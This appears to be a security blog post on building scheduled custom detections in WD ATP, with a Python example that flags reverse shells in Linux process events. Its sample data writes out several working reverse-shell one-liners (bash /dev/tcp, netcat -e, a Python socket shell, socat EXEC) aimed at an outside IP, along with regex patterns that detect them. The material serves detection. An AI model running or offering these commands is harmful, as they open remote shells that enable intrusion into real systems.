In the September release one of the most requested features was added to the WD ATP preview: custom detections backed by scheduled queries.
This means you can now write your own hunting queries and have them run automatically every day, raising an alert whenever they return results.
For this example we created a query to find a simple reverse shell launched from a Linux machine running the Ziften agent.
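To make the detection logic concrete, here is the same idea expressed in Python over a handful of constructed process-start events. This is an added example, not the hunting query from the post and not Ziften's real event schema: the field names (`host`, `parent`, `process`, `cmdline`), the sample events and the `WEB_PARENTS` list are all assumptions made for illustration. It flags the common reverse-shell one-liners (bash `/dev/tcp` redirection, netcat `-e`/`-c`, socat `EXEC:`, scripted socket-plus-shell) and marks any hit whose parent is a web server, since that is the classic webshell-to-reverse-shell pivot an analyst would want escalated.

```python
import re
from typing import Dict, List

# Constructed sample of Linux process-start events, in the rough shape a
# sensor such as Ziften would forward to advanced hunting. Field names are
# assumed for this example and are not the real schema. The first event is
# benign; the remaining four are reverse-shell variants.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "web01", "parent": "sshd", "process": "bash",
     "cmdline": "bash -c 'ls -la /var/www'"},
    {"host": "web01", "parent": "apache2", "process": "bash",
     "cmdline": "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"},
    {"host": "db02", "parent": "cron", "process": "nc",
     "cmdline": "nc -e /bin/sh 203.0.113.10 4444"},
    {"host": "db02", "parent": "python3", "process": "python3",
     "cmdline": "python3 -c \"import socket,subprocess,os;s=socket.socket();"
                "s.connect(('203.0.113.10',4444));os.dup2(s.fileno(),0);"
                "os.dup2(s.fileno(),1);subprocess.call(['/bin/sh','-i'])\""},
    {"host": "app03", "parent": "systemd", "process": "socat",
     "cmdline": "socat TCP:203.0.113.10:4444 EXEC:/bin/bash"},
]

# Parent processes that should never legitimately spawn an outbound shell.
# Assumed list for this example; tune to the environment.
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "tomcat", "java"}

# Each rule is a name plus a regex over the command line. These cover the
# textbook one-liners; a production query needs tuning and exclusions.
REVERSE_SHELL_PATTERNS = [
    ("bash /dev/tcp redirection",
     re.compile(r"/dev/(tcp|udp)/\S+/\d+")),
    ("netcat -e/-c shell",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ec]\s*/bin/(ba)?sh")),
    ("scripted socket+shell",
     re.compile(r"socket\.socket\(.*(dup2|/bin/(ba)?sh)")),
    ("socat EXEC shell",
     re.compile(r"\bsocat\b.*\bEXEC:/bin/(ba)?sh", re.IGNORECASE)),
]


def find_reverse_shells(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event whose command line matches a rule.

    The first matching rule wins, so an event is never reported twice.
    """
    findings: List[Dict[str, object]] = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        for rule_name, pattern in REVERSE_SHELL_PATTERNS:
            if pattern.search(cmd):
                findings.append({
                    "host": ev["host"],
                    "parent": ev["parent"],
                    "rule": rule_name,
                    "cmdline": cmd,
                    # Shell spawned by a web server: likely webshell pivot,
                    # worth a higher severity in the detection rule.
                    "from_web_server": ev["parent"] in WEB_PARENTS,
                })
                break
    return findings


if __name__ == "__main__":
    for hit in find_reverse_shells(SAMPLE_EVENTS):
        flag = " [web-server parent]" if hit["from_web_server"] else ""
        print(f"{hit['host']}: {hit['rule']}{flag}: {hit['cmdline']}")
```

Running the block prints four findings and skips the benign `ls` command; the `apache2`-spawned bash is the one marked as coming from a web-server parent. The same structure (command-line patterns plus a parent-process condition) is what the hunting query expresses in KQL, with the scheduled run turning each match into an alert.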
The next step is to create a detection rule for the query.
You can set an alert title, severity, category, description and recommended actions.
It is worth putting real detail into the recommended actions, since someone else may be the one responding to the alert, or at least a pointer to where they can find further information on the required actions (information sharing is important).
This information can be changed later on.
On the Detection Rule page you can see the alerts it has generated and other information regarding the rule.
All the rules are listed on the left side in the hunting section.
For further information about the new preview features please go to this url:
Happy hunting!
/Sec-Labs